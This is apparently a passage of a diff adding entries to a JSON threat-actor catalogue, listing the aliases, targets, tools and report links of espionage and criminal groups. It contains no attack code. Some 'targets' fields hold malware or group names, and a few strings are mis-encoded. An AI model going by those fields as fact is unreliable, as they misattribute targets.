+ ], + "targets": [ + "Egypt, Jordan, Morocco, Lebanon, Iran, Iraqi Kurdistan" + ], + "operations": [], + "description": "Android malware, Windows malware", + "tools": [], + "links": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/24122414/ZooPark_for_public_final_edited.pdf", + "http://blogs.360.cn/post/analysis-of-APT-C-38.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "middle_east", + "names": [ + "Racquet Bear", + "Pat Bear", + "APT-C-37" + ], + "targets": [ + "DroidJack, SpyNote, SSLove, NJRAT, H-Worm" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Unknown/APT-C-37/26-08-19/APT-C-37%20analysis.md", + "http://blogs.360.cn/post/analysis-of-apt-c-37.html", + "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "Corsair Jackal" + ], + "targets": [ + "Tunesia" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.crowdstrike.com/blog/regional-conflict-and-cyber-blowback/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "The Mask", + "Careto" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/blog/research/58254/the-caretomask-apt-frequently-asked-questions/" + ], + "attck_id": null, + "comment": "Spanish Speaking Country" + }, + { + "country": "other", + "names": [ + "El Machete", + "Machete", + "Ragua" + ], + "targets": [ + "This threat actor targets military, government entities, and telecommunications providers, primarily in Latin America, for the purpose of espionage." + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/", + "https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/", + "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", + "https://www.welivesecurity.com/2019/08/05/sharpening-machete-cyberespionage/", + "https://securelist.com/blog/research/66108/el-machete/" + ], + "attck_id": "G0095 ", + "comment": null + }, + { + "country": "other", + "names": [ + "Dropping Elephant", + "Chinastrats", + "APT-C-09", + "Viceroy Tiger", + "Capricorn Organisation ", + "Neon, Confucius", + "Patchwork", + "Mahaboo" + ], + "targets": [ + "global, including targets in the US, Europe, and the Middle East, many of the target countries are in the area surrounding the Indian subcontinent" + ], + "operations": [ + "Hangover", + "Monsoon" + ], + "description": null, + "tools": [ + "BADNEWS", + "AutoIt backdoor", + "Unknown Logger Public", + "TINYTYPHON" + ], + "links": [ + "https://ti.qianxin.com/blog/articles/coronavirus-analysis-of-global-outbreak-related-cyber-attacks/", + "http://www.sohu.com/a/211497788_764248", + "https://securelist.com/the-dropping-elephant-actor/75328/", + "https://www.cymmetria.com/patchwork-targeted-attack/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/confucius-update-new-tools-and-techniques-further-connections-with-patchwork/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/the-urpage-connection-to-bahamut-confucius-and-patchwork/", + "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/", + "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", + "https://mp.weixin.qq.com/s/AfGrEi-ViJxHEEDtSLvQSg", + "https://blogs.forcepoint.com/security-labs/monsoon-analysis-apt-campaign", + "https://blog.trendmicro.com/trendlabs-security-intelligence/deciphering-confucius-cyberespionage-operations/", + "http://normanshark.com/wp-content/uploads/2013/08/NS-Unveiling-an-Indian-Cyberattack-Infrastructure_FINAL_Web.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-the-patchwork-cyberespionage-group/" + ], + "attck_id": "G0040 ", + "comment": "Overlaps with BITTER (group) " + }, + { + "country": "other", + "names": [ + "Hellsing APT" + ], + "targets": [ + "Naikon" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.kaspersky.com/blog/deny-the-hellsing-apt-by-default/3851/", + "https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "WildNeutron", + "Jripbot", + "Wild Neutron", + "Deceptikons", + "Morpho" + ], + "targets": [ + "Jiripbot, Hesperbot" + ], + "operations": [ + "Sphinx Moth" + ], + "description": null, + "tools": [], + "links": [ + "https://cyware.com/news/new-hacker-for-hire-threat-actor-unearthed-by-security-researchers-e59eba70/?web_view=true", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "Sykipot " + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-sykipot-smartcard-proxy-variant-33919" + ], + "attck_id": "S0018 ", + "comment": null + }, + { + "country": "other", + "names": [ + "DeadlyKiss", + "TwoForOne", + "Platinum" + ], + "targets": [ + "primarily targets governmental organizations, defense institutes, intelligence agencies, and telecommunication providers in South and Southeast Asia" + ], + "operations": [], + "description": null, + "tools": [ + "Hotpatching techniques", + "CVE-2015-2545" + ], + "links": [ + "https://blog.telsy.com/deadlykiss-malware/", + "https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf", + "https://securelist.com/platinum-is-back/91135/", + "https://www.microsoft.com/security/blog/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/?source=mmpc" + ], + "attck_id": "G0068", + "comment": null + }, + { + "country": "other", + "names": [ + "Danti" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "SVCMONDR" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "Transparent Tribe", + "Mythic Leopard", + "Temp.Lapis", + "APT36", + "Green Havildar", + "ProjectM", + "Copper Fieldstone" + ], + "targets": [ + "Government of India diplomatic and military" + ], + "operations": [ + "Operation C-Major" + ], + "description": null, + "tools": [ + "Crimson RAT" + ], + "links": [ + "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", + "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html", + "https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/", + "https://ti.qianxin.com/blog/articles/analysis-of-apt-attack-activities-in-neighboring-countries-and-regions/", + "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", + "https://blog.talosintelligence.com/2022/02/whats-with-shared-vba-code.html", + "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html", + "https://www.trendmicro.com/en_us/research/16/c/indian-military-personnel-targeted-by-information-theft-campaign.html", + "https://blog.malwarebytes.com/threat-analysis/2020/03/apt36-jumps-on-the-coronavirus-bandwagon-delivers-crimson-rat/", + "https://cybleinc.com/2021/04/30/transparent-tribe-operating-with-a-new-variant-of-crimson-rat/", + "https://lab52.io/blog/new-transparentribe-operation-targeting-india-with-weaponized-covid-19-lure-documents/", + "https://cybleinc.com/2020/10/12/transparent-tribe-apt-targets-indian-military/", + "https://blog.360totalsecurity.com/en/cyber-suspicious-cloud-behind-the-peace-treaty-transparent-tribe-reveals-cyber-attacks-in-afghanistan/", + "https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html" + ], + "attck_id": "G0134", + "comment": "possible link to Gorgon Group" + }, + { + "country": "other", + "names": [ + "SectorF01", + "APT-C-00", + "CyberOne Security, CyberOne Technologies, H\u00c3\u00a0nh Tinh Company Limited, Planet and Diacauso", + "Ocean Lotus", + "SeaLotus ", + "APT32" + ], + "targets": [ + "This threat actor targets organizations of interest to the Vietnamese government for espionage purposes. Victims have included human rights organizations, research institutes and maritime construction firms in China, and media organizations. Heavily targeting the automotive sector since 2018. " + ], + "operations": [ + "Cobalt Kitty" + ], + "description": null, + "tools": [ + "SOUNDBITE", + "Denis", + "CobaltStrike", + "Unique suite & OTS", + "RotaJakiro", + "KerrDown", + "Microsoft ActiveMime file attachments" + ], + "links": [ + "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/", + "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/", + "https://threatrecon.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/", + "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/", + "https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html", + "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/", + "https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/", + "https://www.recordedfuture.com/apt32-malware-campaign/", + "https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/", + "https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/", + "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html", + "https://www.brighttalk.com/webcast/10703/261205", + "https://www.cybereason.com/labs-operation-cobalt-kitty-a-large-scale-apt-in-asia-carried-out-by-the-oceanlotus-group/", + "https://blog.cystack.net/word-based-malware-attack/", + "https://community.rsa.com/community/products/netwitness/blog/2018/01/30/apt32-continues-asean-targeting", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://ti.qianxin.com/blog/articles/english-version-of-new-approaches-utilized-by-oceanLotus-to-target-vietnamese-environmentalist/", + "https://www.scmagazineuk.com/ocean-lotus-groupapt-32-identified-as-vietnamese-apt-group/article/663565/", + "https://blog.malwarebytes.com/threat-analysis/2019/04/funky-malware-format-found-in-ocean-lotus-sample/", + "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/", + "https://s.tencent.com/research/report/471.html" + ], + "attck_id": "G0050", + "comment": null + }, + { + "country": "other", + "names": [ + "BlackOasis" + ], + "targets": [ + "Russia, Iraq, Afghanistan, Nigeria, Libya, Jordan, Tunisia, Saudi Arabia, Iran, Netherlands, Bahrain, United Kingdom and Angola" + ], + "operations": [], + "description": null, + "tools": [ + "CVE-2016-0984 \u00e2\u0080\u0093 June 2015", + "CVE-2017-11292 \u00e2\u0080\u0093 Oct 2017", + "CVE-2015-5119 \u00e2\u0080\u0093 June 2015", + "FinSpy Malware", + "CVE-2017-8759 \u00e2\u0080\u0093 Sept 2017", + "CVE-2016-4117 \u00e2\u0080\u0093 May 2016" + ], + "links": [ + "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/" + ], + "attck_id": "G0063 ", + "comment": null + }, + { + "country": "other", + "names": [ + "NEODYMIUM" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/" + ], + "attck_id": "G0055", + "comment": null + }, + { + "country": "other", + "names": [ + "PROMETHIUM", + "APT-C-41", + "StrongPity" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Trojanized: (WinRAR", + "SanDisk)", + "WinUtils", + "TrueCrypt", + "StrongPity (S0491)" + ], + "links": [ + "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", + "https://securelist.com/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/76147/", + "https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/", + "https://threatvector.cylance.com/en_us/home/whack-a-mole-the-impact-of-threat-intelligence-on-adversaries.html", + "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/", + "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/", + "https://www.alienvault.com/blogs/labs-research/newly-identified-strongpity-operations" + ], + "attck_id": "G0056", + "comment": null + }, + { + "country": "other", + "names": [ + "Andromeda Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "Bamboo Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Developed Panda Zeus" + ], + "links": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf page 19" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "Boson Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "CoreBot" + ], + "links": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report_BosonSpider.pdf", + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Cobalt Spider", + "Magecart Group 4" + ], + "targets": [ + "Point of Sale" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-september-cobalt-spider/", + "https://blog.malwarebytes.com/threat-analysis/2019/10/magecart-group-4:-a-link-with-cobalt-group/" + ], + "attck_id": null, + "comment": "Criminal, linked to Cobalt" + }, + { + "country": "other", + "names": [ + "Dextorous Spider" + ], + "targets": [ + "Retail" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "Dungeon Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-october-dungeon-spider/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf " + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Grim Spider", + "TEMP.MixMaster" + ], + "targets": [], + "operations": [ + "Dataresolution.net (MSP for multiple US newpapers)", + "Onslow, North Carolina water" + ], + "description": null, + "tools": [ + "Trickbot", + "Ryuk" + ], + "links": [ + "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "https://blog.kryptoslogic.com/malware/2019/01/10/dprk-emotet.html", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/", + "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-exploring-the-human-connection/", + "https://www.onwasa.com/DocumentCenter/View/3701/Scan-from-2018-10-15-08_08_13-A", + "https://krebsonsecurity.com/2019/01/cloud-hosting-provider-dataresolution-net-battling-christmas-eve-ransomware-attack/", + "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" + ], + "attck_id": "G0102", + "comment": "Criminal / Currently refers to Ryuk deployments following TrickBot infections, Indeterminate overlap with Indrik Spider, Mummy Spider and Wizard Spider" + }, + { + "country": "other", + "names": [ + "Hound Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Evil Corp", + "SectorJ04", + "Indrik Spider", + "GOLD TAHOE", + "TA505" + ], + "targets": [ + "Financial institutions, Retail" + ], + "operations": [], + "description": null, + "tools": [ + "Remote Manipulator System", + "Dridex", + "FlawedAmmyy", + "WastedLocker", + "Cl0p" + ], + "links": [ + "https://www.proofpoint.com/us/threat-insight/post/ta505-targets-us-retail-industry-personalized-attachments", + "https://seguranca-informatica.pt/flawedammyy-leveraging-undetected-xlm-macros-as-an-infection-vehicle/", + "https://blog.yoroi.company/research/ta505-is-expanding-its-operations/", + "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/", + "https://blog.yoroi.company/research/the-stealthy-email-stealer-in-the-ta505-arsenal/", + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter", + "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", + "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat", + "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/", + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15", + "https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times", + "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-spam-campaigns-from-ta505-now-using-new-malware-tools-gelup-and-flowerpippi/", + "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", + "https://blog.prevailion.com/2020/01/ta-505-global-ransomware-criminals.html", + "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south", + "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/", + "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware", + "https://www.group-ib.com/media/silence_ta505_attacks_in_europe/", + "https://e.cyberint.com/hubfs/CyberInt_Cybercriminals%20go%20after%20USA%20retailers_Report.pdf", + "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://blog.cyberint.com/threat-group-ta505-phishing-hijacks-remote-access-tools" + ], + "attck_id": "G0092", + "comment": "Criminal, cooperates with Lazarus group, Indeterminate overlap with Grim Spider, Mummy Spider and Wizard Spider" + }, + { + "country": "other", + "names": [ + "Lunar Spider" + ], + "targets": [ + "Financial Crime" + ], + "operations": [], + "description": null, + "tools": [ + "IcedID (BokBot)" + ], + "links": [ + "https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/", + "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/" + ], + "attck_id": null, + "comment": "Cooperation with Wizard Spider" + }, + { + "country": "other", + "names": [ + "Magnetic Spider" + ], + "targets": [ + "Financial Crime" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf" + ], + "attck_id": null, + "comment": "Russia based \"financial-crime motivated actor\" - Crowdstike 2014 Global TIR pg 57" + }, + { + "country": "other", + "names": [ + "Mimic Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Monty Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf page 19" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Mummy Spider", + "Mealybug", + "TA542" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Emotet " + ], + "links": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/", + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service", + "https://crowdstrike.lookbookhq.com/web-global-threat-report-2019/crowdstrike-2019-gtr", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf " + ], + "attck_id": null, + "comment": "Criminal, Indeterminate overlap with Grim Spider, Indrik Spider and Wizard Spider" + }, + { + "country": "other", + "names": [ + "Overlord Spider" + ], + "targets": [ + "Entertainment and healthcare sector" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf page 7" + ], + "attck_id": null, + "comment": "Criminal / Data Extortion" + }, + { + "country": "other", + "names": [ + "Pinchy Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "GandCrab" + ], + "links": [ + "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Pizzo Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Shark Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Singing Spider" + ], + "targets": [ + "Commercial, Fiancial" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "FIN6", + "ITG08", + "Skeleton Spider", + "Magecart Group 6" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Ransomware", + "Vawtrak/Neverquest", + "FrameworkPoS" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2016/04/follow_the_money.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf ", + "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.proofpoint.com/us/search/site?search_text=TA530&language=en", + "https://exchange.xforce.ibmcloud.com/collection/FIN6-Financial-Crime-Actor-f55930eb9f4438efe9101a618d6a8703", + "https://webcache.googleusercontent.com/search?q=cache:wMkxJorBEKIJ:https://securityintelligence.com/x-force-iris-identifies-fin6-activity-on-pos-networks/+&cd=1&hl=en&ct=clnk&gl=uk&client=firefox-b", + "https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Static Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Union Spider" + ], + "targets": [ + "Manufacturing" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Wicked Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-july-wicked-spider/", + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "ITG23", + "Wizard Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Ryuk", + "TrickBot" + ], + "links": [ + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf page 19", + "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/", + "https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/", + "https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf", + "https://crowdstrike.lookbookhq.com/web-global-threat-report-2019/crowdstrike-2019-gtr page 52", + "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/" + ], + "attck_id": "G0102", + "comment": "Criminal, Indeterminate overlap with Grim Spider, Indirk Spider and Mummy Spider" + }, + { + "country": "other", + "names": [ + "Wold Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Kelihos", + "Pytor Levashov ", + "Zombie Spider" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15; https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2018GlobalThreatReport.pdf page 18" + ], + "attck_id": null, + "comment": "Criminal" + }, + { + "country": "other", + "names": [ + "Curious Jackal" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Activist" + }, + { + "country": "other", + "names": [ + "Extreme Jackal" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Activist" + }, + { + "country": "other", + "names": [ + "Gekko Jackal" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Activist" + }, + { + "country": "other", + "names": [ + "Shifty Jackal" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15" + ], + "attck_id": null, + "comment": "Activist" + }, + { + "country": "other", + "names": [ + "Mythic\u00c2\u00a0Leopard" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + "names": [ + "GravityRAT" + ], + "targets": [ + "India" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://www.cyberscoop.com/gravityrat-cisco-talos-india-pakistan/", + "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "other", + 